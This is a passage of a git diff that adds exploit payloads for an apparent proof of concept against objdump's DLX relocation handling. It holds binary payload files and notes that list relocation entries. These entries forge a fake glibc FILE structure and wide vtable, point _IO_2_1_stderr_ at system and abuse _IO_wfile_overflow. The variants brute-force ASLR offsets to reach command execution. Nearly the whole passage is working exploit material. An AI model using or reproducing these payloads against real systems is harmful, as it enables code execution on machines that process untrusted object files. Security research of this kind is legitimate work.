reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin new file mode 100644 index 0000000..5cea988 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes new file mode 100644 index 0000000..51c11b5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin new file mode 100644 index 0000000..79841f5 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes new file mode 100644 index 0000000..8ba2cee --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin new file mode 100644 index 0000000..9eb3932 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes new file mode 100644 index 0000000..641f6ce --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin new file mode 100644 index 0000000..b534929 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes new file mode 100644 index 0000000..97f797a --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000..714a463 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..1a1b38c --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin new file mode 100644 index 0000000..5a44876 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes new file mode 100644 index 0000000..77ffde1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin new file mode 100644 index 0000000..c3bd2df Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes new file mode 100644 index 0000000..b4830e1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin new file mode 100644 index 0000000..d255eda Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes new file mode 100644 index 0000000..b97fe85 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin new file mode 100644 index 0000000..5cea988 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes new file mode 100644 index 0000000..8f41d5d --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin new file mode 100644 index 0000000..79841f5 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes new file mode 100644 index 0000000..ccba346 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git 